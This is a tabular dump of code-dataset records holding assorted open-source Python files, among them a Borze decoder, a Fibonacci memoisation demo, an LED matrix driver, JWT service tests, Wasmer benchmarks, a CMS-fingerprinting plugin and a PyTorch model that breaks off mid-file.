max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
Codeforces/Python/B_Borze.py
|
chetnalal/Daily-Coding-DS-ALGO-Practice
| 289 |
63922
|
<filename>Codeforces/Python/B_Borze.py<gh_stars>100-1000
# Ternary numeric notation is quite popular in Berland. To telegraph the ternary number the Borze alphabet is used. Digit 0 is transmitted as «.», 1 as «-.» and 2 as «--». You are to decode the Borze code, i.e. to find out the ternary number given its representation in Borze alphabet.
# Input
# The first line contains a number in Borze code. The length of the string is between 1 and 200 characters. It's guaranteed that the given string is a valid Borze code of some ternary number (this number can have leading zeroes).
# Output
# Output the decoded ternary number. It can have leading zeroes.
# input
# .-.--
# output
# 012
# input
# --.
# output
# 20
# input
# -..-.--
# output
# 1012
s = input() #input the string
size = len(s) # it calculate the size of the input string
i = 0 # pointed at starting of the string
j = i+1
string = "" #empty string
while j < len(s): # this loop works till j == size of the input string(s)
if s[i] == ".":
string += "0"
i = j
j = i+1
elif s[i] == "-" and s[j] == ".":
string += "1"
i = j+1
j = i+1
elif s[i] == "-" and s[j] == "-":
string += "2"
i = j+1
j = i+1
while i < len(s):
if s[i] == ".":
string += "0"
i+=1
print(string)
|
attic/decorators/fibonacci.py
|
banjin/FluentPython-example
| 5,651 |
63938
|
<gh_stars>1000+
# source: http://oeis.org/A000045
fibo_seq = [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610,
987, 1597, 2584, 4181, 6765, 10946, 17711, 28657, 46368, 75025,
121393, 196418, 317811, 514229, 832040, 1346269, 2178309,
3524578, 5702887, 9227465, 14930352, 24157817, 39088169]
from functools import lru_cache
def fibonacci(n):
if n < 2:
return n
return fibonacci(n-2) + fibonacci(n-1)
@lru_cache()
def fibonacci2(n):
if n < 2:
return n
return fibonacci2(n-2) + fibonacci2(n-1)
def memoize(func):
'''simplest memoizing decorator'''
cache = {}
def memoized(*args):
if args not in cache:
cache[args] = func(*args)
return cache[args]
return memoized
def test():
for i, expected in enumerate(fibo_seq[:31]):
print(i, expected)
assert fibonacci(i) == expected
def chronograph():
global fibonacci
from time import time
t0 = time()
n = 32
res = fibonacci(n)
#res = [fibonacci(n) for n in range(30)]
t1 = time()
print(n, res, format(t1-t0, '0.6f'))
t0 = time()
res = fibonacci2(n)
#res = [fibonacci2(n) for n in range(30)]
t1 = time()
print(n, res, format(t1-t0, '0.6f'))
t0 = time()
fibonacci = memoize(fibonacci)
res = fibonacci(n)
#res = [fibonacci2(n) for n in range(30)]
t1 = time()
print(n, res, format(t1-t0, '0.6f'))
if __name__=='__main__':
#test()
chronograph()
|
PythonAPI/docs/snipets/carla.World.load_map_layer.py
|
zakur0/carla
| 7,883 |
63974
|
<gh_stars>1000+
# This recipe toggles on several layers in our "_Opt" maps
# Load town one with only minimum layout (roads, sidewalks, traffic lights and traffic signs)
world = client.load_world('Town01_Opt', carla.MapLayer.None)
# Toggle all buildings on
world.load_map_layer(carla.MapLayer.Buildings)
# Toggle all foliage on
world.load_map_layer(carla.MapLayer.Foliage)
# Toggle all parked vehicles on
world.load_map_layer(carla.MapLayer.ParkedVehicles)
|
unsupervisedRR/utils/io.py
|
Sebastian-Jung/unsupervisedRR
| 105 |
63978
|
"""
Some useful I/O functions
"""
import os
import pickle
import shutil
# get all directories in a specific directory
def get_directories(path):
return [f for f in os.listdir(path) if os.path.isdir(os.path.join(path, f))]
# get all the files in a specific directory
# extension can be string or tuple of strings
def get_files(path, extension=None):
files = [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]
if extension is not None:
files = [f for f in files if f.lower().endswith(extension)]
return files
# get all files in a specific directory
def file_exists(path):
return not os.path.exists(path)
# make directory
def makedir(path, replace_existing=False):
if not os.path.exists(path):
os.makedirs(path)
elif replace_existing:
shutil.rmtree(path)
os.makedirs(path)
else:
print("Beware .. path {} already exists".format(path))
# extract relative path from a root-directory and an absolute path
def relative_path(root, path):
return os.path.relpath(path, root)
# save pickle
def save_pickle(path, data):
with open(path, "wb") as f:
pickle.dump(data, f)
# load pickle
def load_pickle(path):
with open(path, "rb") as f:
return pickle.load(f)
|
facebook_business/utils/version.py
|
MyrikLD/facebook-python-business-sdk
| 576 |
64001
|
# Copyright 2014 Facebook, Inc.
# You are hereby granted a non-exclusive, worldwide, royalty-free license to
# use, copy, modify, and distribute this software in source code or binary
# form for use in connection with the web services and APIs provided by
# Facebook.
# As with any software that integrates with the Facebook platform, your use
# of this software is subject to the Facebook Developer Principles and
# Policies [http://developers.facebook.com/policy/]. This copyright notice
# shall be included in all copies or substantial portions of the software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""
Gets the current Facebook Python SDK version.
"""
import os
import re
def get_version():
this_dir = os.path.dirname(__file__)
package_init_filename = os.path.join(this_dir, '../__init__.py')
version = None
with open(package_init_filename, 'r') as handle:
file_content = handle.read()
version = re.search(
r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
file_content, re.MULTILINE
).group(1)
if not version:
raise ValueError('Cannot find version information')
return version
|
auto_ts/models/ar_based/__init__.py
|
barrosm/Auto_TS
| 423 |
64031
|
from .build_arima import BuildArima
from .build_sarimax import BuildSarimax
from .build_autoarimax import BuildAutoSarimax
from .build_var import BuildVAR
|
applications/MetisApplication/tests/test_MetisApplication_mpi.py
|
clazaro/Kratos
| 778 |
64042
|
<reponame>clazaro/Kratos
# import Kratos
import KratosMultiphysics
import KratosMultiphysics.MetisApplication
if not KratosMultiphysics.IsDistributedRun():
raise Exception("This test script can only be executed in MPI!")
# Import Kratos "wrapper" for unittests
import KratosMultiphysics.KratosUnittest as KratosUnittest
# Import the tests o test_classes to create the suits
from test_metis_submodelpart_list import TestMetisSubModelPartList
def AssembleTestSuites():
''' Populates the test suites to run.
Populates the test suites to run. At least, it should pupulate the suites:
"mpi_small", "mpi_nightly" and "mpi_all"
Return
------
suites: A dictionary of suites
The set of suites with its test_cases added.
'''
suites = KratosUnittest.KratosSuites
# Create a test suit with the selected tests (Small tests):
# smallSuite will contain the following tests:
# - testSmallExample
smallMPISuite = suites['mpi_small']
smallMPISuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([TestMetisSubModelPartList]))
# Create a test suit with the selected tests
# nightSuite will contain the following tests:
# - testSmallExample
# - testNightlyFirstExample
# - testNightlySecondExample
nightMPISuite = suites['mpi_nightly']
nightMPISuite.addTests(smallMPISuite)
# Create a test suit that contains all the tests from every testCase
# in the list:
allMPISuite = suites['mpi_all']
allMPISuite.addTests(nightMPISuite)
return suites
if __name__ == '__main__':
KratosUnittest.runTests(AssembleTestSuites())
|
library/scrollphat/IS31FL3730.py
|
fejao/scroll-phat
| 115 |
64055
|
<filename>library/scrollphat/IS31FL3730.py
MODE_5X11 = 0b00000011
class I2cConstants:
def __init__(self):
self.I2C_ADDR = 0x60
self.CMD_SET_MODE = 0x00
self.CMD_SET_BRIGHTNESS = 0x19
self.MODE_5X11 = 0b00000011
class IS31FL3730:
def __init__(self, smbus, font):
self.bus = smbus
self.font = font
self.i2cConstants = I2cConstants()
self._rotate = False
self.bus = self.bus.SMBus(1)
self.buffer = [0] * 11
self.offset = 0
self.error_count = 0
self.set_mode(self.i2cConstants.MODE_5X11)
def set_rotate(self, value):
self._rotate = value
def rotate5bits(self, x):
r = 0
if x & 16:
r = r | 1
if x & 8:
r = r | 2
if x & 4:
r = r | 4
if x & 2:
r = r | 8
if x & 1:
r = r | 16
return r
def update(self):
if self.offset + 11 <= len(self.buffer):
self.window = self.buffer[self.offset:self.offset + 11]
else:
self.window = self.buffer[self.offset:]
self.window += self.buffer[:11 - len(self.window)]
if self._rotate:
self.window.reverse()
for i in range(len(self.window)):
self.window[i] = self.rotate5bits(self.window[i])
self.window.append(0xff)
try:
self.bus.write_i2c_block_data(self.i2cConstants.I2C_ADDR, 0x01, self.window)
except IOError:
self.error_count += 1
if self.error_count == 10:
print("A high number of IO Errors have occurred, please check your soldering/connections.")
def set_mode(self, mode=MODE_5X11):
self.bus.write_i2c_block_data(self.i2cConstants.I2C_ADDR, self.i2cConstants.CMD_SET_MODE, [self.i2cConstants.MODE_5X11])
def get_brightness(self):
if hasattr(self, 'brightness'):
return self.brightness
return -1
def set_brightness(self, brightness):
self.brightness = brightness
self.bus.write_i2c_block_data(self.i2cConstants.I2C_ADDR, self.i2cConstants.CMD_SET_BRIGHTNESS, [self.brightness])
def set_col(self, x, value):
if len(self.buffer) <= x:
self.buffer += [0] * (x - len(self.buffer) + 1)
self.buffer[x] = value
def write_string(self, chars, x = 0):
for char in chars:
if ord(char) == 0x20 or ord(char) not in self.font:
self.set_col(x, 0)
x += 1
self.set_col(x, 0)
x += 1
self.set_col(x, 0)
x += 1
else:
font_char = self.font[ord(char)]
for i in range(0, len(font_char)):
self.set_col(x, font_char[i])
x += 1
self.set_col(x, 0)
x += 1 # space between chars
self.update()
# draw a graph across the screen either using
# the supplied min/max for scaling or auto
# scaling the output to the min/max values
# supplied
def graph(self, values, low=None, high=None):
values = [float(x) for x in values]
if low == None:
low = min(values)
if high == None:
high = max(values)
span = high - low
for col, value in enumerate(values):
value -= low
value /= span
value *= 5
if value > 5: value = 5
if value < 0: value = 0
self.set_col(col, [0,16,24,28,30,31][int(value)])
self.update()
def set_buffer(self, replacement):
self.buffer = replacement
def buffer_len(self):
return len(self.buffer)
def scroll(self, delta = 1):
self.offset += delta
self.offset %= len(self.buffer)
self.update()
def clear_buffer(self):
self.offset = 0
self.buffer = [0] * 11
def clear(self):
self.clear_buffer()
self.update()
def load_font(self, new_font):
self.font = new_font
def scroll_to(self, pos = 0):
self.offset = pos
self.offset %= len(self.buffer)
self.update()
def io_errors(self):
return self.error_count
def set_pixel(self, x,y,value):
if value:
self.buffer[x] |= (1 << y)
else:
self.buffer[x] &= ~(1 << y)
|
server/src/shared_helpers/tests/services_tests.py
|
dashhudson/go-links
| 176 |
64076
|
import datetime
import unittest
from flask import Blueprint, request, jsonify
from freezegun import freeze_time
from mock import Mock, patch
import jwt
from requests.exceptions import HTTPError
from shared_helpers import services
from testing import TrottoTestCase, LIVE_APP_HOST
class TestFunctions(unittest.TestCase):
@patch('shared_helpers.services.get_service_config', return_value={'signing_secret': 'so_secret'})
def test__create_internal_token(self, mock_get_service_config):
now = datetime.datetime.now(datetime.timezone.utc)
with freeze_time(now):
token = services._create_internal_token('my_service', {'id': 1})
self.assertEqual({'exp': int(now.timestamp()) + 30,
'id': 1},
jwt.decode(token, 'so_secret', algorithms=['HS256']))
with freeze_time(now + datetime.timedelta(seconds=40)):
with self.assertRaises(jwt.exceptions.ExpiredSignatureError):
jwt.decode(token, 'so_secret', algorithms=['HS256'])
mock_get_service_config.assert_called_once_with('my_service')
@patch('shared_helpers.services.requests.get')
@patch('shared_helpers.services._create_internal_token', return_value='internal_token')
@patch('shared_helpers.services.get_service_config', return_value={'base_url': 'https://trot.to'})
def test_get__basic(self, mock_get_service_config, mock_create_internal_token, mock_requests_get):
mock_response = Mock()
mock_response.json.return_value = {'id': 1}
mock_requests_get.return_value = mock_response
self.assertEqual({'id': 1},
services.get('my_service', 'api/users'))
mock_get_service_config.assert_called_once_with('my_service')
mock_create_internal_token.assert_called_once_with('my_service', {'url': 'https://trot.to/api/users'})
mock_requests_get.assert_called_once_with('https://trot.to/api/users',
headers={'X-Token': 'internal_token'})
@patch('shared_helpers.services.requests.get')
@patch('shared_helpers.services._create_internal_token', return_value='internal_token')
@patch('shared_helpers.services.get_service_config', return_value={'base_url': 'https://trot.to/'})
def test_get__trailing_and_leading_slashes(self,
mock_get_service_config, mock_create_internal_token, mock_requests_get):
mock_response = Mock()
mock_response.json.return_value = {'id': 1}
mock_requests_get.return_value = mock_response
self.assertEqual({'id': 1},
services.get('my_service', '/api/users'))
mock_get_service_config.assert_called_once_with('my_service')
mock_create_internal_token.assert_called_once_with('my_service', {'url': 'https://trot.to/api/users'})
mock_requests_get.assert_called_once_with('https://trot.to/api/users',
headers={'X-Token': 'internal_token'})
@patch('shared_helpers.services.requests.get')
@patch('shared_helpers.services._create_internal_token', return_value='internal_token')
@patch('shared_helpers.services.get_service_config', return_value={'base_url': 'https://trot.to'})
def test_get__http_error(self, mock_get_service_config, mock_create_internal_token, mock_requests_get):
mock_response = Mock()
mock_response.raise_for_status.side_effect = HTTPError
mock_requests_get.return_value = mock_response
with self.assertRaises(HTTPError):
services.get('my_service', 'api/users')
mock_get_service_config.assert_called_once_with('my_service')
mock_create_internal_token.assert_called_once_with('my_service', {'url': 'https://trot.to/api/users'})
mock_requests_get.assert_called_once_with('https://trot.to/api/users',
headers={'X-Token': 'internal_token'})
def test_validate_internal_request__no_token(self):
mock_request = Mock()
mock_request.headers = {}
with self.assertRaises(services.InvalidInternalToken) as cm:
services.validate_internal_request(mock_request)
self.assertEqual('no token',
str(cm.exception))
@patch('shared_helpers.services.get_config_by_key_path', return_value='so_secret')
def test_validate_internal_request__invalid_signature__wrong_secret(self, mock_get_config_by_key_path):
token = jwt.encode({'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=30),
'url': 'https://trot.to/api/users'},
'a_secret',
algorithm='HS256')
mock_request = Mock()
mock_request.headers = {'X-Token': token}
mock_request.url = 'https://trot.to/api/users'
with self.assertRaises(services.InvalidInternalToken) as cm:
services.validate_internal_request(mock_request)
self.assertEqual('invalid signature',
str(cm.exception))
mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])
@patch('shared_helpers.services.get_config_by_key_path', return_value='so_secret')
def test_validate_internal_request__invalid_signature__no_exp(self, mock_get_config_by_key_path):
token = jwt.encode({'url': 'https://trot.to/api/users'},
'so_secret',
algorithm='HS256')
mock_request = Mock()
mock_request.headers = {'X-Token': token}
mock_request.url = 'https://trot.to/api/users'
with self.assertRaises(services.InvalidInternalToken) as cm:
services.validate_internal_request(mock_request)
self.assertEqual('missing exp',
str(cm.exception))
mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])
@patch('shared_helpers.services.get_config_by_key_path', return_value='so_secret')
def test_validate_internal_request__expired_token(self, mock_get_config_by_key_path):
token = jwt.encode({'exp': datetime.datetime.utcnow() - datetime.timedelta(seconds=1),
'url': 'https://trot.to/api/users'},
'so_secret',
algorithm='HS256')
mock_request = Mock()
mock_request.headers = {'X-Token': token}
mock_request.url = 'https://trot.to/api/users'
with self.assertRaises(services.InvalidInternalToken) as cm:
services.validate_internal_request(mock_request)
self.assertEqual('expired',
str(cm.exception))
mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])
@patch('shared_helpers.services.get_config_by_key_path', return_value='so_secret')
def test_validate_internal_request__mismatched_url(self, mock_get_config_by_key_path):
token = jwt.encode({'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=30),
'url': 'https://trot.to/api/users/1'},
'so_secret',
algorithm='HS256')
mock_request = Mock()
mock_request.headers = {'X-Token': token}
mock_request.url = 'https://trot.to/api/users'
with self.assertRaises(services.InvalidInternalToken) as cm:
services.validate_internal_request(mock_request)
self.assertEqual('mismatched URL',
str(cm.exception))
mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])
@patch('shared_helpers.services.get_config_by_key_path', return_value='so_secret')
def test_validate_internal_request__valid_token(self, mock_get_config_by_key_path):
token = jwt.encode({'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=30),
'url': 'https://trot.to/api/users'},
'so_secret',
algorithm='HS256')
mock_request = Mock()
mock_request.headers = {'X-Token': token}
mock_request.url = 'https://trot.to/api/users'
self.assertEqual(True,
services.validate_internal_request(mock_request))
mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])
routes = Blueprint('test', __name__)
@routes.route('/_/api/users', methods=['GET'])
def get_users():
services.validate_internal_request(request)
return jsonify([{'id': 1}])
class TestIntegration(TrottoTestCase):
blueprints_under_test = [routes]
start_live_app = True
live_app_config = {'sessions_secret': 'a_sessions_secret',
'signing_secret': 'so_secret',
'postgres': {'url': 'postgresql://admin:testing@/testing_trotto_core'}}
@patch('shared_helpers.config.get_config', return_value={'services': {'my_service': {'signing_secret': 'so_secret',
'base_url': LIVE_APP_HOST}}})
def test_internal_request__real_handler__valid_token(self, _):
self.assertEqual([{'id': 1}],
services.get('my_service', '/_/api/users'))
@patch('shared_helpers.config.get_config', return_value={'services': {'my_service': {'signing_secret': 'a_secret',
'base_url': LIVE_APP_HOST}}})
def test_internal_request__real_handler__invalid_token(self, _):
with self.assertRaises(HTTPError) as cm:
self.assertEqual([{'id': 1}],
services.get('my_service', '/_/api/users'))
self.assertEqual(500,
cm.exception.response.status_code)
|
wikipedia-sentences/app.py
|
nikosNalmpantis/examples
| 434 |
64085
|
<reponame>nikosNalmpantis/examples
__copyright__ = "Copyright (c) 2021 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
import os
import sys
import click
import random
from jina import Flow, Document, DocumentArray
from jina.logging.predefined import default_logger as logger
MAX_DOCS = int(os.environ.get('JINA_MAX_DOCS', 10000))
def config(dataset: str):
if dataset == 'toy':
os.environ['JINA_DATA_FILE'] = os.environ.get('JINA_DATA_FILE', 'data/toy-input.txt')
elif dataset == 'full':
os.environ['JINA_DATA_FILE'] = os.environ.get('JINA_DATA_FILE', 'data/input.txt')
os.environ['JINA_PORT'] = os.environ.get('JINA_PORT', str(45678))
cur_dir = os.path.dirname(os.path.abspath(__file__))
os.environ.setdefault('JINA_WORKSPACE', os.path.join(cur_dir, 'workspace'))
os.environ.setdefault('JINA_WORKSPACE_MOUNT',
f'{os.environ.get("JINA_WORKSPACE")}:/workspace/workspace')
def print_topk(resp, sentence):
for doc in resp.data.docs:
print(f"\n\n\nTa-Dah🔮, here's what we found for: {sentence}")
for idx, match in enumerate(doc.matches):
score = match.scores['cosine'].value
print(f'> {idx:>2d}({score:.2f}). {match.text}')
def input_generator(num_docs: int, file_path: str):
with open(file_path) as file:
lines = file.readlines()
num_lines = len(lines)
random.shuffle(lines)
for i in range(min(num_docs, num_lines)):
yield Document(text=lines[i])
def index(num_docs):
flow = Flow().load_config('flows/flow.yml')
data_path = os.path.join(os.path.dirname(__file__), os.environ.get('JINA_DATA_FILE', None))
with flow:
flow.post(on='/index', inputs=input_generator(num_docs, data_path),
show_progress=True)
def query(top_k):
flow = Flow().load_config('flows/flow.yml')
with flow:
text = input('Please type a sentence: ')
doc = Document(content=text)
result = flow.post(on='/search', inputs=DocumentArray([doc]),
parameters={'top_k': top_k},
line_format='text',
return_results=True,
)
print_topk(result[0], text)
@click.command()
@click.option(
'--task',
'-t',
type=click.Choice(['index', 'query'], case_sensitive=False),
)
@click.option('--num_docs', '-n', default=MAX_DOCS)
@click.option('--top_k', '-k', default=5)
@click.option('--dataset', '-d', type=click.Choice(['toy', 'full']), default='toy')
def main(task, num_docs, top_k, dataset):
config(dataset)
if task == 'index':
if os.path.exists(os.environ.get("JINA_WORKSPACE")):
logger.error(f'\n +---------------------------------------------------------------------------------+ \
\n | 🤖🤖🤖 | \
\n | The directory {os.environ.get("JINA_WORKSPACE")} already exists. Please remove it before indexing again. | \
\n | 🤖🤖🤖 | \
\n +---------------------------------------------------------------------------------+')
sys.exit(1)
index(num_docs)
elif task == 'query':
query(top_k)
if __name__ == '__main__':
main()
|
examples/table_validate.py
|
vincentchevrier/tableschema-py
| 224 |
64088
|
from tableschema import Table
# Data from WEB, schema from MEMORY
SOURCE = 'https://raw.githubusercontent.com/frictionlessdata/tableschema-py/master/data/data_infer.csv'
SCHEMA = {'fields': [{'name': 'id', 'type': 'integer'}, {'name': 'age', 'type': 'integer'}, {'name': 'name', 'type': 'string'}] }
# If schema is not passed it will be inferred
table = Table(SOURCE, schema=SCHEMA)
rows = table.iter()
while True:
try:
print(next(rows))
except StopIteration:
break
except Exception as exception:
print(exception)
|
lib/plugins/3dcart.py
|
ikstream/Zeus-Scanner
| 841 |
64160
|
import re
import lib.core.common
__product__ = "3dcart"
__description__ = (
"The 3dcart Shopping Cart Software is a complete e-commerce solution for anyone."
)
def search(html, **kwargs):
html = str(html)
headers = kwargs.get("headers", None)
plugin_detection_schema = (
re.compile(r"3dcart.stats", re.I),
re.compile(r"/3dvisit/", re.I)
)
for plugin in plugin_detection_schema:
if plugin.search(html) is not None:
return True
if plugin.search(headers.get(lib.core.common.HTTP_HEADER.SET_COOKIE, "")) is not None:
return True
|
pykg2vec/test/test_hp_loader.py
|
baxtree/pykg2vec
| 430 |
64171
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This module is for testing unit functions of the hyperparameter loader
"""
import os
import pytest
from pykg2vec.common import KGEArgParser
from pykg2vec.common import HyperparameterLoader
def test_load_default_hyperparameter_file():
hp_loader = HyperparameterLoader(KGEArgParser().get_args([]))
hyperparams = hp_loader.load_hyperparameter("freebase15k", "analogy")
search_space = hp_loader.load_search_space("analogy")
assert hyperparams["learning_rate"] == 0.1
assert hyperparams["hidden_size"] == 200
assert str(search_space["epochs"].inputs()[1]) == "0 Literal{10}"
def test_load_custom_hyperparameter_file():
custom_hyperparamter_file = os.path.join(os.path.dirname(__file__), "resource", "custom_hyperparams", "custom_hpf.yaml")
custom_ss_file = os.path.join(os.path.dirname(__file__), "resource", "custom_hyperparams", "custom_ssf.yaml")
hp_loader = HyperparameterLoader(KGEArgParser().get_args(["-hpf", custom_hyperparamter_file, "-ssf", custom_ss_file]))
hyperparams = hp_loader.load_hyperparameter("freebase15k", "analogy")
search_space = hp_loader.load_search_space("analogy")
assert hyperparams["learning_rate"] == 0.01
assert hyperparams["hidden_size"] == 200
assert str(search_space["epochs"].inputs()[1]) == "0 Literal{100}"
def test_exception_on_hyperparameter_file_not_exist():
with pytest.raises(FileNotFoundError) as e:
hp_loader = HyperparameterLoader(KGEArgParser().get_args(["-hpf", "not_exist_file"]))
hp_loader.load_hyperparameter("freebase15k", "analogy")
assert str(e.value) == "Cannot find configuration file not_exist_file"
def test_exception_on_search_space_file_not_exist():
with pytest.raises(FileNotFoundError) as e:
hp_loader = HyperparameterLoader(KGEArgParser().get_args(["-ssf", "not_exist_file"]))
hp_loader.load_search_space("analogy")
assert str(e.value) == "Cannot find configuration file not_exist_file"
def test_exception_on_hyperparameter_file_with_wrong_extension():
custom_hyperparamter_file = os.path.join(os.path.dirname(__file__), "resource", "custom_hyperparams", "custom.txt")
with pytest.raises(ValueError) as e:
hp_loader = HyperparameterLoader(KGEArgParser().get_args(["-hpf", custom_hyperparamter_file]))
hp_loader.load_hyperparameter("freebase15k", "analogy")
assert str(e.value) == "Configuration file must have .yaml or .yml extension: %s" % custom_hyperparamter_file
def test_exception_on_search_space_file_with_wrong_extension():
custom_hyperparamter_file = os.path.join(os.path.dirname(__file__), "resource", "custom_hyperparams", "custom.txt")
with pytest.raises(ValueError) as e:
hp_loader = HyperparameterLoader(KGEArgParser().get_args(["-ssf", custom_hyperparamter_file]))
hp_loader.load_search_space("analogy")
assert str(e.value) == "Configuration file must have .yaml or .yml extension: %s" % custom_hyperparamter_file
|
src/genie/libs/parser/iosxe/tests/ShowClnsIsNeighborsDetail/cli/equal/golden_output_3_expected.py
|
balmasea/genieparser
| 204 |
64179
|
expected_output = {
"tag": {
"test": {
"system_id": {
"R2_xr": {
"type": {
"L1L2": {
"area_address": ["49.0001"],
"circuit_id": "R1_xe.01",
"format": "Phase V",
"interface": "GigabitEthernet2.115",
"ip_address": ["10.12.115.2*"],
"ipv6_address": ["FE80::F816:3EFF:FE67:2452"],
"nsf": "capable",
"priority": 64,
"state": "up",
"topology": ["ipv4", "ipv6"],
"uptime": "3d04h",
}
}
},
"R3_nx": {
"type": {
"L1L2": {
"area_address": ["49.0001"],
"circuit_id": "R1_xe.02",
"format": "Phase V",
"interface": "GigabitEthernet3.115",
"ip_address": ["10.13.115.3*"],
"ipv6_address": ["FE80::5C01:FF:FE02:7"],
"nsf": "capable",
"priority": 64,
"state": "up",
"topology": ["ipv4", "ipv6"],
"uptime": "3d04h",
}
}
},
}
},
"test1": {
"system_id": {
"2222.22ff.4444": {
"type": {
"L1L2": {
"area_address": ["49.0001"],
"circuit_id": "2222.22ff.4444.01",
"format": "Phase V",
"interface": "GigabitEthernet2.415",
"ip_address": ["10.12.115.2*"],
"ipv6_address": ["FE80::F816:3EFF:FE67:2452"],
"nsf": "capable",
"priority": 128,
"state": "init",
"topology": ["ipv4", "ipv6"],
"uptime": "3d04h",
}
}
},
"R3_nx": {
"type": {
"L1L2": {
"area_address": ["49.0001"],
"circuit_id": "R1_xe.02",
"format": "Phase V",
"interface": "GigabitEthernet3.415",
"ip_address": ["10.13.115.3*"],
"ipv6_address": ["FE80::5C01:FF:FE02:7"],
"nsf": "capable",
"priority": 64,
"state": "up",
"topology": ["ipv4", "ipv6"],
"uptime": "3d04h",
}
}
},
}
},
}
}
|
benchmarks/test_headless_time.py
|
TheRakeshPurohit/wasmer-python
| 900 |
64185
|
from wasmer import engine, Store, Module, Instance
from wasmer_compiler_cranelift import Compiler as Cranelift
from wasmer_compiler_llvm import Compiler as LLVM
from wasmer_compiler_singlepass import Compiler as Singlepass
TEST_BYTES = open('benchmarks/nbody.wasm', 'rb').read()
def test_benchmark_headless_time_nbody_cranelift_jit(benchmark):
store = Store(engine.JIT(Cranelift))
module = Module(store, TEST_BYTES)
serialized = module.serialize()
@benchmark
def bench():
deserialized = Module.deserialize(store, serialized)
_ = Instance(deserialized)
def test_benchmark_headless_time_nbody_cranelift_native(benchmark):
store = Store(engine.Native(Cranelift))
module = Module(store, TEST_BYTES)
serialized = module.serialize()
@benchmark
def bench():
deserialized = Module.deserialize(store, serialized)
_ = Instance(deserialized)
def test_benchmark_headless_time_nbody_llvm_jit(benchmark):
store = Store(engine.JIT(LLVM))
module = Module(store, TEST_BYTES)
serialized = module.serialize()
@benchmark
def bench():
deserialized = Module.deserialize(store, serialized)
_ = Instance(deserialized)
def test_benchmark_headless_time_nbody_llvm_native(benchmark):
store = Store(engine.Native(LLVM))
module = Module(store, TEST_BYTES)
serialized = module.serialize()
@benchmark
def bench():
deserialized = Module.deserialize(store, serialized)
_ = Instance(deserialized)
def test_benchmark_headless_time_nbody_singlepass_jit(benchmark):
store = Store(engine.JIT(Singlepass))
module = Module(store, TEST_BYTES)
serialized = module.serialize()
@benchmark
def bench():
deserialized = Module.deserialize(store, serialized)
_ = Instance(deserialized)
def test_benchmark_headless_time_nbody_singlepass_native(benchmark):
store = Store(engine.Native(Singlepass))
module = Module(store, TEST_BYTES)
serialized = module.serialize()
@benchmark
def bench():
deserialized = Module.deserialize(store, serialized)
_ = Instance(deserialized)
|
tests/data/cli_args.py
|
festeh/docker-pretty-ps
| 241 |
64189
|
<filename>tests/data/cli_args.py
class CliArgs(object):
def __init__(self):
self.search = []
self.all = False
self.slim = False
self.include = False
self.order = False
self.reverse = False
self.json = False
self.version = False
|
physics_aware_training/model_architectures/SplitInputParameterNet.py
|
mcmahon-lab/Physics-Aware-Training
| 182 |
64240
|
import torch
import torch.nn as nn
import physics_aware_training.digital_twin_utils
class SplitInputParameterNet(nn.Module):
def __init__(self,
input_dim,
nparams,
output_dim,
parameterNunits = [100,100,100],
internalNunits = [10,10,10]):
'''
Defines network that splits inputs x into physical system input and parameters.
Inputs are propagated through a "main" neural network whose weights are predicted by an
auxiliary neural network whose inputs are the parameters.
Args:
inputDim (int): dimension of physical system inputs
outputDim (int): dimension of physical system outputs
parameterDim (int): dimension of all physical system parameters combined
parameterNunits (list of int): defines the number of hidden units per layer in the
auxiliary parameter network.
internalDim (int): number of hidden units per layer of the main neural network that
propagates physical system inputs
inputNlayers (int): number of hidden layers of main neural network
'''
super(SplitInputParameterNet, self).__init__()
self.input_dim = input_dim
self.nparams = nparams
self.output_dim = output_dim
self.internalNunits = internalNunits
self.inputNlayers = len(internalNunits)
nparameters = 0
for i in range(len(internalNunits)-1):
nparameters += internalNunits[i]*internalNunits[i+1]
nparameters += internalNunits[i+1]
# parameterNet is a submodel that predicts a matrix of dimensions
self.parameterNet = torch.nn.Sequential()
self.parameterNet.add_module("fcIn", torch.nn.Linear(nparams, parameterNunits[0]))
for i in range(len(parameterNunits)):
if i<len(parameterNunits)-1:
self.parameterNet.add_module(f"relu{i}", torch.nn.ReLU())
self.parameterNet.add_module(f"fc{i}", torch.nn.Linear(parameterNunits[i], parameterNunits[i+1]))
else:
self.parameterNet.add_module(f"relu{i}", torch.nn.ReLU())
self.parameterNet.add_module(f"fcOut", torch.nn.Linear(parameterNunits[i], nparameters))
# two fully connected input and output layers adjust the input and output dimenstion to
# the internal dimension
self.fcIn = nn.Linear(input_dim, internalNunits[0])
self.fcOut = nn.Linear(internalNunits[-1], output_dim)
def forward(self, x):
batch_size, _ = x.shape
# initialize matrices for inputNet
inputNetMatrices = []
inputNetBiases = []
for i in range(len(self.internalNunits)-1):
inputNetMatrices.append([torch.zeros(batch_size, self.internalNunits[i], self.internalNunits[i+1])])
inputNetBiases.append([torch.zeros(batch_size, self.internalNunits[i+1], 1)])
# split x into physical system inputs and parameters
inputs = x[:, :self.input_dim]
parameters = x[:, self.input_dim:]
# AUXILIARY PARAMETER NETWORK
